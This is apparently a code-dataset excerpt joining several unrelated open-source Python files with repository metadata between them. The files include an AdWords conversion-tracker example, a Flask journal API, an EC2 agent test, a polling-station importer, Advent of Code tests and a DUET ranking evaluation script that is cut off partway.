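#   transport = TTransport.TBufferedTransport(TSocket.TSocket('localhost', 9090))
#   protocol = TBinaryProtocol.TBinaryProtocol(transport)
#   client = Client(protocol)
#   transport.open()
#   client.ping()                        # True if the server responds
#   nums = client.generateNums()         # list of i32 values
#   stats = client.calculateStat(nums)   # StatStruct defined in ttypes
#   transport.close()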
| 30.400771
| 188
| 0.680504
|
6129d236a97b8cfe5c00e78aa8feb6d900ec6278
| 3,978
|
py
|
Python
|
adwords_python3_examples_10.1.0/v201710/remarketing/add_conversion_trackers.py
|
xyla-io/hazel
|
260ce906761d8b808c21ca61b44cc71ca3329e8c
|
[
"MIT"
] | null | null | null |
adwords_python3_examples_10.1.0/v201710/remarketing/add_conversion_trackers.py
|
xyla-io/hazel
|
260ce906761d8b808c21ca61b44cc71ca3329e8c
|
[
"MIT"
] | null | null | null |
adwords_python3_examples_10.1.0/v201710/remarketing/add_conversion_trackers.py
|
xyla-io/hazel
|
260ce906761d8b808c21ca61b44cc71ca3329e8c
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
#
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This example adds AdWords conversion trackers.
Adds an AdWords conversion tracker and an upload conversion tracker.
The LoadFromStorage method is pulling credentials and properties from a
"googleads.yaml" file. By default, it looks for this file in your home
directory. For more information, see the "Caching authentication information"
section of our README.
"""
import uuid
from googleads import adwords
def main(client):
# Initialize appropriate service.
conversion_tracker_service = client.GetService(
'ConversionTrackerService', version='v201710')
# Create an AdWords conversion tracker.
adwords_conversion_tracker = {
'xsi_type': 'AdWordsConversionTracker',
'name': 'Earth to Mars Cruises Conversion #%s' % uuid.uuid4(),
'category': 'DEFAULT',
# Optional fields.
'status': 'ENABLED',
'viewthroughLookbackWindow': '15',
'defaultRevenueValue': '23.41',
'alwaysUseDefaultRevenueValue': 'true'
}
upload_conversion = {
'xsi_type': 'UploadConversion',
'name': 'Upload Conversion #%s' % uuid.uuid4(),
# Optional fields.
# Set an appropriate category. This will be set to DEFAULT if not
# specified.
'category': 'LEAD',
'viewthroughLookbackWindow': '30',
'ctcLookbackWindow': '90',
# Set the default currency code to use for conversions that do
# not specify a conversion currency. This must be an ISO 4217 3-character
# code such as "EUR" or "USD".
# If this field is not set, AdWords will use the account's currency.
'defaultRevenueCurrencyCode': 'EUR',
# Set the default revenue value to use for conversions that do not specify
    # a conversion value. Note that this value should NOT be in micros.
'defaultRevenueValue': '2.50',
# To upload fractional conversion credits, mark the upload conversion as
# externally attributed. To learn more about importing externally
# attributed conversions, see:
# https://developers.google.com/adwords/api/docs/guides/conversion-tracking#importing_externally_attributed_conversions
# 'isExternallyAttributed': 'true'
}
# Construct operations.
operations = [{
'operator': 'ADD',
'operand': conversion_tracker
} for conversion_tracker in [adwords_conversion_tracker, upload_conversion]]
# Add the conversions.
conversion_trackers = conversion_tracker_service.mutate(operations)
# Display results.
for conversion_tracker in conversion_trackers['value']:
    if (conversion_tracker['ConversionTracker.Type'] ==
        'AdWordsConversionTracker'):
print(('Conversion tracker with ID "%d", name "%s", status "%s" '
'and category "%s" and snippet \n"%s"\n was added.' %
(conversion_tracker['id'], conversion_tracker['name'],
conversion_tracker['status'], conversion_tracker['category'],
conversion_tracker['snippet'])))
else:
print(('Conversion with ID "%d", name "%s", status "%s", and category '
'"%s" was added.'
% (conversion_tracker['id'], conversion_tracker['name'],
conversion_tracker['status'], conversion_tracker['category'])))
if __name__ == '__main__':
# Initialize client object.
adwords_client = adwords.AdWordsClient.LoadFromStorage()
main(adwords_client)
| 38.25
| 125
| 0.698592
|
7711f21861b0dedaf44da997db3f6d28b89038ea
| 857
|
py
|
Python
|
setup.py
|
potatolondon/django-hashbrown
|
bb78243b649ddc7a8acb66bbbd5c2643ba7bfca0
|
[
"BSD-2-Clause"
] | 13
|
2015-02-06T12:07:23.000Z
|
2022-03-18T23:20:22.000Z
|
setup.py
|
potatolondon/django-hashbrown
|
bb78243b649ddc7a8acb66bbbd5c2643ba7bfca0
|
[
"BSD-2-Clause"
] | 3
|
2015-03-09T10:23:55.000Z
|
2018-08-29T09:42:32.000Z
|
setup.py
|
potatolondon/django-hashbrown
|
bb78243b649ddc7a8acb66bbbd5c2643ba7bfca0
|
[
"BSD-2-Clause"
] | 4
|
2016-07-20T14:08:06.000Z
|
2019-07-18T09:30:07.000Z
|
import os
from setuptools import setup, find_packages
def read(*rnames):
return open(os.path.join(os.path.dirname(__file__), *rnames)).read()
setup(
name="django-hashbrown",
version="0.7.0",
author="Pablo Recio",
author_email="pablo@potatolondon.com",
description="Yet another dead simple feature switching library for Django.",
long_description=(read('README.md')),
classifiers=[
'Development Status :: 4 - Beta',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
],
license="BSD",
keywords="django feature switching potato",
url='https://github.com/potatolondon/django-hashbrown',
packages=find_packages(),
zip_safe=False,
)
| 28.566667
| 80
| 0.655776
|
23939bac8e429b28aff1a06e4660864b270551bd
| 164
|
py
|
Python
|
bin/iamonds/one-sided-hexiamonds-trefoil-1.py
|
tiwo/puzzler
|
7ad3d9a792f0635f7ec59ffa85fb46b54fd77a7e
|
[
"Intel"
] | null | null | null |
bin/iamonds/one-sided-hexiamonds-trefoil-1.py
|
tiwo/puzzler
|
7ad3d9a792f0635f7ec59ffa85fb46b54fd77a7e
|
[
"Intel"
] | null | null | null |
bin/iamonds/one-sided-hexiamonds-trefoil-1.py
|
tiwo/puzzler
|
7ad3d9a792f0635f7ec59ffa85fb46b54fd77a7e
|
[
"Intel"
] | 1
|
2022-01-02T16:54:14.000Z
|
2022-01-02T16:54:14.000Z
|
#!/usr/bin/env python
# $Id$
"""many solutions"""
import puzzler
from puzzler.puzzles.hexiamonds import OneSidedHexiamondsTrefoil1 as puzzle
puzzler.run(puzzle)
| 16.4
| 75
| 0.77439
|
38fff84b4c52b40c0ff62e54125f0dddad1080ce
| 1,625
|
py
|
Python
|
lightkurve/time.py
|
burke86/lightkurve
|
fda3e92544ccc3c6b38d003b2980a232fbcbbd0b
|
[
"MIT"
] | 1
|
2021-05-07T10:42:01.000Z
|
2021-05-07T10:42:01.000Z
|
lightkurve/time.py
|
burke86/lightkurve
|
fda3e92544ccc3c6b38d003b2980a232fbcbbd0b
|
[
"MIT"
] | 7
|
2018-07-14T17:49:36.000Z
|
2020-09-24T19:58:13.000Z
|
lightkurve/time.py
|
barentsen/lightkurve
|
5b1693832bc509e42742d1b6f20224d131e62d8c
|
[
"MIT"
] | null | null | null |
"""Adds the BKJD and BTJD time format for use by Astropy's `Time` object."""
from astropy.time.formats import TimeNumeric, day_frac
class TimeBKJD(TimeNumeric):
"""
Barycentric Kepler Julian Date time format.
This represents the number of days since January 1, 2009 12:00:00 UTC.
BKJD is the format in which times are recorded in Kepler data products.
See Section 2.3.2 in the Kepler Archive Manual for details.
"""
name = 'bkjd'
BKJDREF = 2454833 # Barycentric Kepler Julian Date offset
def set_jds(self, val1, val2):
self._check_scale(self._scale) # Validate scale.
jd1, jd2 = day_frac(val1, val2)
jd1 += self.BKJDREF
self.jd1, self.jd2 = day_frac(jd1, jd2)
def to_value(self, **kwargs):
jd1 = self.jd1 - self.BKJDREF
jd2 = self.jd2
return super().to_value(jd1=jd1, jd2=jd2, **kwargs)
value = property(to_value)
class TimeBTJD(TimeNumeric):
"""
Barycentric TESS Julian Date time format.
This represents the number of days since JD 2457000.0.
BTJD is the format in which times are recorded in TESS data products.
"""
name = 'btjd'
BTJDREF = 2457000 # Barycentric TESS Julian Date offset
def set_jds(self, val1, val2):
self._check_scale(self._scale) # Validate scale.
jd1, jd2 = day_frac(val1, val2)
jd1 += self.BTJDREF
self.jd1, self.jd2 = day_frac(jd1, jd2)
def to_value(self, **kwargs):
jd1 = self.jd1 - self.BTJDREF
jd2 = self.jd2
return super().to_value(jd1=jd1, jd2=jd2, **kwargs)
value = property(to_value)
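# --- Usage sketch ---
# Assuming astropy auto-registers TimeFormat subclasses by name (so importing
# this module is enough), the new formats can be used directly with `Time`.
# The value below is illustrative, not taken from a real light curve.
if __name__ == '__main__':
    from astropy.time import Time
    t = Time(1000.0, format='bkjd', scale='tdb')
    print(t.jd)    # 2455833.0 == 1000.0 + TimeBKJD.BKJDREF
    print(t.btjd)  # the same instant as days since JD 2457000.0, i.e. -1167.0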
| 32.5
| 76
| 0.651692
|
0ed31141ab23336ce9ccc2e9894808f8c6023279
| 1,503
|
py
|
Python
|
profiles_api/views.py
|
bertcanoiii/Django_RestAPI_Course
|
4bac42aee77187240c0628360ce43af62c8f4839
|
[
"MIT"
] | null | null | null |
profiles_api/views.py
|
bertcanoiii/Django_RestAPI_Course
|
4bac42aee77187240c0628360ce43af62c8f4839
|
[
"MIT"
] | null | null | null |
profiles_api/views.py
|
bertcanoiii/Django_RestAPI_Course
|
4bac42aee77187240c0628360ce43af62c8f4839
|
[
"MIT"
] | null | null | null |
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework import status
from profiles_api import serializers
class HelloApiView(APIView):
"""Test API view!"""
serializer_class = serializers.HelloSerializer
    def get(self, request, format=None):
"""Returns list of API features"""
an_apiview = [
"Uses HTTP Methods as functions",
"Similar to traditional Django views",
"Give the most control over your application logic",
"Is mapped manually to urls"
]
return Response({"message": "Hello!", "an_apiview": an_apiview})
def post(self, request):
"""Create a hello message with our name"""
serializer = self.serializer_class(data=request.data)
if serializer.is_valid():
name = serializer.validated_data.get("name")
message = f"Hello {name}!"
return Response({"message": message})
else:
return Response(
serializer.errors,
status=status.HTTP_400_BAD_REQUEST
)
def put(self, request, pk=None):
"""Handle updating an object"""
return Response({"method": "PUT"})
def patch(self, request, pk=None):
"""Handle a partial update of an object"""
return Response({"method": "PATCH"})
def delete(self, request, pk=None):
"""Delete and object"""
return Response({"method": "DELETE"})
| 31.978723
| 72
| 0.611444
|
a0a62eebf1c173551ea4b944d6ecad5d17c0a636
| 2,765
|
py
|
Python
|
fmridenoise/utils/entities.py
|
brain-net-cog/fMRIDenoise
|
22de3251573bd87ffb4cf5097bd5a8bfefb6f47f
|
[
"Apache-2.0"
] | 22
|
2019-06-23T14:40:02.000Z
|
2020-01-10T15:05:13.000Z
|
fmridenoise/utils/entities.py
|
brain-net-cog/fMRIDenoise
|
22de3251573bd87ffb4cf5097bd5a8bfefb6f47f
|
[
"Apache-2.0"
] | 35
|
2020-01-22T16:15:16.000Z
|
2022-01-24T17:40:29.000Z
|
fmridenoise/utils/entities.py
|
brain-net-cog/fMRIDenoise
|
22de3251573bd87ffb4cf5097bd5a8bfefb6f47f
|
[
"Apache-2.0"
] | 11
|
2020-04-01T21:18:41.000Z
|
2021-12-14T10:55:09.000Z
|
import typing as t
from bids.layout import parse_file_entities, writing
from fmridenoise.pipelines import extract_pipeline_from_path
def parse_file_entities_with_pipelines(filename, entities=None, config=None,
include_unmatched=False) -> t.Dict[str, str]:
"""
    bids.parse_file_entities extended with the ability to also extract the pipeline name from the path.
"""
et_dict = parse_file_entities(filename, entities, config, include_unmatched)
pipeline = extract_pipeline_from_path(filename)
if pipeline:
et_dict['pipeline'] = pipeline
return et_dict
def is_entity_subset(entity_superset: t.Dict[str, str], entity_subset: t.Dict[str, str]) -> bool:
"""
Checks if all key values in subset are in superset
Args:
entity_superset: bigger dict
entity_subset: smaller dict
    Returns: True if all key-value pairs from entity_subset are in entity_superset
"""
return all(entity_superset.get(entity_key) == entity_value for entity_key, entity_value in entity_subset.items())
def build_path(entities, path_patterns, strict=False):
"""
Extension of bids.build_path that throws exception instead of returning None
Args:
entities:
A dictionary mapping entity names to entity values.
Entities with ``None`` or empty-string value will be removed.
Otherwise, entities will be cast to string values, therefore
if any format is expected (e.g., zero-padded integers), the
value should be formatted.
path_patterns:
            One or more path pattern strings. Patterns contain {entity}
            placeholders and may mark optional components with square
            brackets; the first pattern whose mandatory entities are all
            present in ``entities`` is used to build the path.
strict:
If True, all passed entities must be matched inside a
pattern in order to be a valid match. If False, extra entities will
be ignored so long as all mandatory entities are found.
Returns: built path
"""
path = writing.build_path(entities, path_patterns, strict)
if path is not None:
return path
else:
raise ValueError(f"Unable to build path with given entities: {entities}\n and path pattern {path_patterns}")
def assert_all_entities_equal(entities: t.List[t.Dict[str, str]], *entities_names: str) -> None:
if len(entities) == 0:
return
for name in entities_names:
first = entities[0].get(name)
if any(entity.get(name) != first for entity in entities):
raise AssertionError(f"Not all entities equal for key: {name}\n"
f"{[entitie.get(name) for entitie in entities]}")
| 40.072464
| 117
| 0.682821
|
baeb61c93d41b2a20bd8906339a7dacf6ed5c1ea
| 3,633
|
py
|
Python
|
journal/modules/api/__init__.py
|
Pandentia/journal
|
7b0d84346a5dab05de2ddc60a5c0dd40bd95d27d
|
[
"MIT"
] | 1
|
2018-09-24T22:14:46.000Z
|
2018-09-24T22:14:46.000Z
|
journal/modules/api/__init__.py
|
Pandentia/journal
|
7b0d84346a5dab05de2ddc60a5c0dd40bd95d27d
|
[
"MIT"
] | 10
|
2018-09-24T22:15:46.000Z
|
2018-10-06T19:06:36.000Z
|
journal/modules/api/__init__.py
|
Pandentia/journal
|
7b0d84346a5dab05de2ddc60a5c0dd40bd95d27d
|
[
"MIT"
] | null | null | null |
import typing
import functools
import ujson
from flask import Blueprint, Response, current_app, abort, request
from werkzeug.exceptions import HTTPException
from journal.helpers import recaptcha
bp = Blueprint(name='api', import_name=__name__, url_prefix='/api')
class UserException(Exception):
def __init__(self, msg):
super().__init__(msg)
def verify_fields(data, check: typing.Dict[str, typing.Any], *ignore: str) -> dict:
verified = {}
if not isinstance(data, dict):
raise UserException('Data payload is invalid.')
for k, v in check.items():
if k not in data:
raise UserException('Required field "{}" missing.'.format(k))
if not isinstance(data[k], v):
raise UserException('Field "{}" was of type "{}", "{}" expected.'
.format(k, type(data[k]).__name__, v.__name__))
verified[k] = data[k]
for k in ignore:
if k in data:
verified[k] = data[k]
return verified
def respond(data: typing.Optional[typing.Union[dict, list]] = None, *, status: int = 200):
resp = Response()
if not data:
status = 204
resp.status_code = status
if data:
        if not isinstance(data, list) and not isinstance(data, dict):
            data = {'response': data}
resp.data = ujson.dumps(data)
resp.headers = {'Content-Type': 'application/json'}
return resp
@bp.before_request
def setup():
auth = request.headers.get('Authorization')
if auth:
request.user = current_app.db.get_user(token=auth)
else:
request.user = None
def auth_required(f):
@functools.wraps(f)
def decorated(*args, **kwargs):
if not request.user:
return abort(401)
return f(*args, **kwargs)
return decorated
def error(e):
return respond({'error': {'code': e.code, 'name': e.name}}, status=e.code)
@bp.errorhandler(HTTPException)
def errorhandler(e):
return error(e)
@bp.errorhandler(UserException)
def user_exception(e):
return respond({'error': {'code': 400, 'name': 'Bad Request', 'info': str(e)}}, status=400)
@bp.route('/login', methods=['POST'])
def login():
data = verify_fields(request.json, {'username': str, 'password': str}, 'recaptcha_response')
if recaptcha.is_enabled():
data = verify_fields(data, {'recaptcha_response': str}, 'username', 'password')
if not recaptcha.validate(data['recaptcha_response']):
raise UserException('reCAPTCHA was invalid.')
user = current_app.db.get_user(username=data['username'])
if user is None:
raise UserException('Username or password invalid.')
if not user.check_pw(data['password']):
raise UserException('Username or password invalid.')
return respond({'token': user.create_token()})
@bp.route('/users/@me', methods=['GET'])
@auth_required
def me():
return respond(request.user.to_json())
@bp.route('/entries', methods=['GET'])
@auth_required
def entries():
return respond([
{'id': x.id, 'author_id': x.id, 'title': x.title, 'tags': x.tags, 'timestamp': x.timestamp.isoformat()}
for x in request.user.entries()
])
# noinspection PyShadowingBuiltins
@bp.route('/entries/<id>', methods=['GET'])
@auth_required
def entry(id):
try:
id = int(id)
if id < 0:
raise ValueError()
except ValueError:
raise UserException('ID given is not an integer.')
entry = current_app.db.get_entry(id)
if not entry or not entry.can_access(request.user):
return abort(404)
return respond(entry.to_json())
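# --- verify_fields sketch (illustrative payloads) ---
# verify_fields() returns only the checked (plus explicitly ignored) keys and
# raises UserException on a missing field or a type mismatch.
if __name__ == '__main__':
    ok = verify_fields({'username': 'amy', 'password': 'pw', 'extra': 1},
                       {'username': str, 'password': str})
    assert ok == {'username': 'amy', 'password': 'pw'}
    try:
        verify_fields({'username': 'amy'}, {'username': str, 'password': str})
    except UserException as exc:
        assert 'password' in str(exc)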
| 26.911111
| 111
| 0.633911
|
8cb4d04d051b18ef633f5cf32a659096b1dbfd52
| 3,614
|
py
|
Python
|
InfrastructureManager/tests/test_ec2_agent_w_spot.py
|
UCSB-CS-RACELab/eager-appscale
|
d58fe64bb867ef58af19c1d84a5e1ec68ecddd3d
|
[
"Apache-2.0"
] | 3
|
2016-06-12T01:18:49.000Z
|
2018-07-16T18:20:23.000Z
|
InfrastructureManager/tests/test_ec2_agent_w_spot.py
|
nlake44/appscale
|
6944af660ca4cb772c9b6c2332ab28e5ef4d849f
|
[
"Apache-2.0"
] | null | null | null |
InfrastructureManager/tests/test_ec2_agent_w_spot.py
|
nlake44/appscale
|
6944af660ca4cb772c9b6c2332ab28e5ef4d849f
|
[
"Apache-2.0"
] | 1
|
2020-05-25T02:59:15.000Z
|
2020-05-25T02:59:15.000Z
|
from agents.factory import InfrastructureAgentFactory
import boto
import boto.ec2
from boto.ec2.connection import EC2Connection
from boto.ec2.instance import Reservation, Instance
from boto.ec2.keypair import KeyPair
from boto.ec2.securitygroup import SecurityGroup
from boto.exception import EC2ResponseError
from flexmock import flexmock
from infrastructure_manager import InfrastructureManager
import time
from utils import utils
try:
from unittest import TestCase
except ImportError:
from unittest.case import TestCase
__author__ = 'hiranya'
__email__ = 'hiranya@appscale.com'
class TestEC2Agent(TestCase):
def test_ec2_run_instances(self):
i = InfrastructureManager(blocking=True)
# first, validate that the run_instances call goes through successfully
# and gives the user a reservation id
full_params = {
'credentials': {'a': 'b', 'EC2_URL': 'http://testing.appscale.com:8773/foo/bar',
'EC2_ACCESS_KEY': 'access_key', 'EC2_SECRET_KEY': 'secret_key'},
'group': 'boogroup',
'image_id': 'booid',
'infrastructure': 'ec2',
'instance_type': 'booinstance_type',
'keyname': 'bookeyname',
'num_vms': '1',
'use_spot_instances': 'True',
'max_spot_price' : '1.23',
'region' : 'my-zone-1',
'zone' : 'my-zone-1b'
}
id = '0000000000' # no longer randomly generated
full_result = {
'success': True,
'reservation_id': id,
'reason': 'none'
}
self.assertEquals(full_result, i.run_instances(full_params, 'secret'))
# next, look at run_instances internally to make sure it actually is
# updating its reservation info
self.assertEquals(InfrastructureManager.STATE_RUNNING, i.reservations.get(id)['state'])
vm_info = i.reservations.get(id)['vm_info']
self.assertEquals(['public-ip'], vm_info['public_ips'])
self.assertEquals(['private-ip'], vm_info['private_ips'])
self.assertEquals(['i-id'], vm_info['instance_ids'])
def setUp(self):
fake_ec2 = flexmock(name='fake_ec2')
fake_ec2.should_receive('get_key_pair')
fake_ec2.should_receive('create_key_pair').with_args('bookeyname') \
.and_return(KeyPair())
fake_ec2.should_receive('get_all_security_groups').and_return([])
fake_ec2.should_receive('create_security_group') \
.with_args('boogroup', 'AppScale security group') \
.and_return(SecurityGroup())
fake_ec2.should_receive('authorize_security_group')
reservation = Reservation()
instance = flexmock(name='instance', private_dns_name='private-ip',
public_dns_name='public-ip', id='i-id', state='running',
key_name='bookeyname')
reservation.instances = [instance]
fake_ec2.should_receive('get_all_instances').and_return([]) \
.and_return([reservation])
fake_ec2.should_receive('terminate_instances').and_return([instance])
fake_ec2.should_receive('request_spot_instances')
flexmock(boto.ec2)
boto.ec2.should_receive('connect_to_region').and_return(fake_ec2)
(flexmock(utils)
.should_receive('get_secret')
.and_return('secret'))
(flexmock(utils)
.should_receive('sleep')
.and_return())
(flexmock(utils)
.should_receive('get_random_alphanumeric')
.and_return('0000000000'))
(flexmock(utils)
.should_receive('write_key_file')
.and_return())
def tearDown(self):
(flexmock(utils)
.should_receive('get_secret')
.reset())
(flexmock(utils)
.should_receive('sleep')
.reset())
(flexmock(utils)
.should_receive('get_random_alphanumeric')
.reset())
| 33.462963
| 91
| 0.697288
|
e2102eb2c87ded066f41a8b58223ee1b2fdee9c5
| 4,402
|
py
|
Python
|
polling_stations/apps/data_importers/management/commands/import_solihull.py
|
danielgriffin48/UK-Polling-Stations
|
0e5273357a4fdc00c2af794c71558b6f8f2a0a49
|
[
"BSD-3-Clause"
] | null | null | null |
polling_stations/apps/data_importers/management/commands/import_solihull.py
|
danielgriffin48/UK-Polling-Stations
|
0e5273357a4fdc00c2af794c71558b6f8f2a0a49
|
[
"BSD-3-Clause"
] | 364
|
2020-10-19T07:16:41.000Z
|
2022-03-31T06:10:55.000Z
|
polling_stations/apps/data_importers/management/commands/import_solihull.py
|
danielgriffin48/UK-Polling-Stations
|
0e5273357a4fdc00c2af794c71558b6f8f2a0a49
|
[
"BSD-3-Clause"
] | null | null | null |
from django.contrib.gis.geos import Point
from data_importers.management.commands import BaseXpressDemocracyClubCsvImporter
class Command(BaseXpressDemocracyClubCsvImporter):
council_id = "E08000029"
addresses_name = "parl.2019-12-12/Version 1/Democracy_Club__12December2019.CSV"
stations_name = "parl.2019-12-12/Version 1/Democracy_Club__12December2019.CSV"
elections = ["parl.2019-12-12"]
allow_station_point_from_postcode = False
def station_record_to_dict(self, record):
# These polling places have a UPRN, and the addressbase postcode doesn't match
# the postcode from the council. In these cases the addressbase postcode matches
# the postcode used on the venue's website.
        # Online references to Station ID 7680 (Whar Hall Road Community Centre) don't
# align with addressbase, but the postcodes are adjacent. So leaving postcode
# as is in the CSV.
if record.polling_place_id == "7518": # Barston Memorial Institute
record = record._replace(polling_place_postcode="B92 0JU")
if record.polling_place_id == "7550": # St Clements Church
record = record._replace(polling_place_postcode="B36 0BA")
if record.polling_place_id == "7561": # Kingshurst Evangelical Church
record = record._replace(polling_place_postcode="B37 6NP")
if (
record.polling_place_id == "7626"
): # The Royal British Legion (Knowle) Club Limited
record = record._replace(polling_place_postcode="B93 9LU")
if record.polling_place_id == "7660": # Woodlands Campus
record = record._replace(polling_place_postcode="B36 0NF")
# Fixes carried forward
# Three Trees Community Centre
if record.polling_place_id == "7571":
record = record._replace(polling_place_uprn="100071461342")
# Dorridge Methodist Church
if record.polling_place_id == "7586":
record = record._replace(polling_place_uprn="100071001475")
rec = super().station_record_to_dict(record)
# Tudor Grange Leisure Centre
if record.polling_place_id == "7726":
rec["location"] = Point(-1.7881577, 52.4124167, srid=4326)
# Catherine de Barnes Village Hall
if record.polling_place_id == "7515":
rec["location"] = Point(-1.7382134, 52.4203089, srid=4326)
return rec
def address_record_to_dict(self, record):
rec = super().address_record_to_dict(record)
uprn = record.property_urn.strip().lstrip("0")
if uprn == "10090949380":
rec["postcode"] = "B93 0FH"
if (record.addressline1, record.addressline2) == (
"101 Noble Way",
"Cheswick Green",
):
rec["uprn"] = "10090950327"
rec["accept_suggestion"] = True
if uprn in [
"10090945527", # B377RN -> B376RL : 3C Woodlands Way, Chelmsley Wood
"10090945525", # B377RN -> B376RL : 3A Woodlands Way, Chelmsley Wood
]:
rec["accept_suggestion"] = True
if record.addressline6 in [
"B90 4AY", # stray odd-looking property
"CV7 7HL", # single property with spurious-looking station
]:
return None
if uprn in [
"100071001341", # B911DA -> B911JW : 90 Grange Road, Solihull
"10090946742", # B901FT -> B930EJ : Apartment 16, Leasowes House, 3 Main Street, Dickens Heath, Solihull
"10090948318", # B901GL -> B913AB : Apartment 5, Market Court, 61 Old Dickens Heath Road, Shirley, Solihull
"10090947804", # CV49BN -> B901FT : 12 Eagle Drive, Solihull
"200003834455", # B927AW -> B927AH : St Michaels Residential Home, 251 Warwick Road, Solihull
"10090946771", # B920JP -> B930FD : Caravan Firs Farm, Barston Lane, Solihull
"10090948319", # B912AW -> B913AB : Flat 2, 58 Lode Lane, Solihull
"100070965323", # B376ES -> B376EU : 77 Overgreen Drive, Kingshurst
"100070965320", # B376ES -> B376EU : 77A Overgreen Drive, Kingshurst
"100070965321", # B376ES -> B376EU : 77B Overgreen Drive, Kingshurst
"100070965322", # B376ES -> B376EU : 77C Overgreen Drive, Kingshurst
]:
rec["accept_suggestion"] = False
return rec
| 46.829787
| 120
| 0.637438
|
a9aefe76b63591df69e485f31359a5e8e36a478c
| 1,301
|
py
|
Python
|
15/tests.py
|
remihuguet/aoc2020
|
c313c5b425dda92d949fd9ca4f18ff66f452794f
|
[
"MIT"
] | null | null | null |
15/tests.py
|
remihuguet/aoc2020
|
c313c5b425dda92d949fd9ca4f18ff66f452794f
|
[
"MIT"
] | null | null | null |
15/tests.py
|
remihuguet/aoc2020
|
c313c5b425dda92d949fd9ca4f18ff66f452794f
|
[
"MIT"
] | null | null | null |
import pytest
import memory
inputs = [
(0, 3, 6, 436),
(1, 3, 2, 1),
(2, 1, 3, 10),
(1, 2, 3, 27),
(2, 3, 1, 78),
(3, 2, 1, 438),
(3, 1, 2, 1836)
]
@pytest.fixture(params=inputs)
def starting(request):
return list(request.param[:3]), request.param[-1]
def test_apply_rule_for_one_turn():
starting = list(inputs[0][:3])
assert 0 == memory.next(starting)
assert 3 == memory.next(starting + [0])
assert 3 == memory.next(starting + [0, 3])
assert 1 == memory.next(starting + [0, 3, 3])
assert 0 == memory.next(starting + [0, 3, 3, 1])
assert 4 == memory.next(starting + [0, 3, 3, 1, 0])
assert 0 == memory.next(starting + [0, 3, 3, 1, 0, 4])
def test_find_2020_number(starting):
numbers, expec = starting
assert expec == memory.compute_number_at_turn(turn=2020, starting=numbers)
inputs_high = [
(0, 3, 6, 175594),
(1, 3, 2, 2578),
(2, 1, 3, 3544142),
(1, 2, 3, 261214),
(2, 3, 1, 6895259),
(3, 2, 1, 18),
(3, 1, 2, 362)
]
@pytest.fixture(params=inputs_high)
def starting_h(request):
return list(request.param[:3]), request.param[-1]
def test_find_high_number(starting_h):
numbers, expec = starting_h
assert expec == memory.compute_number_at_turn(turn=30000000, starting=numbers)
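# --- Sketch of the `memory` module these tests exercise (AoC 2020, day 15) ---
# Not the project's memory.py (which is not shown here); a minimal version of
# the spoken-number rule the tests encode, kept as a comment for reference.
#
#   def next(spoken):
#       last = spoken[-1]
#       if last not in spoken[:-1]:
#           return 0
#       prev_turn = len(spoken) - 1 - spoken[-2::-1].index(last)
#       return len(spoken) - prev_turn
#
#   def compute_number_at_turn(turn, starting):
#       last_seen = {n: i + 1 for i, n in enumerate(starting[:-1])}
#       current = starting[-1]
#       for t in range(len(starting), turn):
#           nxt = t - last_seen[current] if current in last_seen else 0
#           last_seen[current] = t
#           current = nxt
#       return current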
| 23.654545
| 82
| 0.601845
|
7ad45585d373b05738f33a228a114bffd168c7de
| 3,165
|
py
|
Python
|
ranking_baselines/DUET/test.py
|
dileep1996/mnsrf_ranking_suggestion
|
5bd241fb49f08fa4937539991e12e5a502d5a072
|
[
"MIT"
] | 1
|
2020-02-04T18:27:25.000Z
|
2020-02-04T18:27:25.000Z
|
ranking_baselines/DUET/test.py
|
dileep1996/mnsrf_ranking_suggestion
|
5bd241fb49f08fa4937539991e12e5a502d5a072
|
[
"MIT"
] | null | null | null |
ranking_baselines/DUET/test.py
|
dileep1996/mnsrf_ranking_suggestion
|
5bd241fb49f08fa4937539991e12e5a502d5a072
|
[
"MIT"
] | null | null | null |
###############################################################################
# Author: Wasi Ahmad
# Project: https://www.microsoft.com/en-us/research/wp-content/uploads/2016/10/wwwfp0192-mitra.pdf
# Date Created: 7/23/2017
#
# File Description: This script evaluates test ranking performance.
###############################################################################
import torch, helper, util, data, os, numpy
from model import DUET
from rank_metrics import mean_average_precision, NDCG, MRR
args = util.get_args()
# Set the random seed manually for reproducibility.
numpy.random.seed(args.seed)
torch.manual_seed(args.seed)
def test_ranking(model, test_batches):
num_batches = len(test_batches)
map, mrr, ndcg_1, ndcg_3, ndcg_5, ndcg_10 = 0, 0, 0, 0, 0, 0
for batch_no in range(1, num_batches + 1):
test_queries, test_docs, test_labels = helper.batch_to_tensor(test_batches[batch_no - 1], model.dictionary,
model.config.max_query_length,
model.config.max_doc_length)
if model.config.cuda:
test_queries = test_queries.cuda()
test_docs = test_docs.cuda()
test_labels = test_labels.cuda()
softmax_prob = model(test_queries, test_docs)
map += mean_average_precision(softmax_prob, test_labels)
mrr += MRR(softmax_prob, test_labels)
ndcg_1 += NDCG(softmax_prob, test_labels, 1)
ndcg_3 += NDCG(softmax_prob, test_labels, 3)
ndcg_5 += NDCG(softmax_prob, test_labels, 5)
ndcg_10 += NDCG(softmax_prob, test_labels, 10)
map = map / num_batches
mrr = mrr / num_batches
ndcg_1 = ndcg_1 / num_batches
ndcg_3 = ndcg_3 / num_batches
ndcg_5 = ndcg_5 / num_batches
ndcg_10 = ndcg_10 / num_batches
print('MAP - ', map)
print('MRR - ', mrr)
print('NDCG@1 - ', ndcg_1)
print('NDCG@3 - ', ndcg_3)
print('NDCG@5 - ', ndcg_5)
print('NDCG@10 - ', ndcg_10)
if __name__ == "__main__":
dictionary = data.Dictionary(5)
dictionary.load_dictionary(args.save_path, 'vocab.csv', 5000)
model = DUET(dictionary, args)
if 'CUDA_VISIBLE_DEVICES' in os.environ:
cuda_visible_devices = [int(x) for x in os.environ['CUDA_VISIBLE_DEVICES'].split(',')]
if len(cuda_visible_devices) > 1:
model = torch.nn.DataParallel(model, device_ids=cuda_visible_devices)
if args.cuda:
model = model.cuda()
checkpoint = helper.load_from_checkpoint(os.path.join(args.save_path, 'model_best.pth.tar'), args.cuda)
model.load_state_dict(checkpoint['state_dict'])
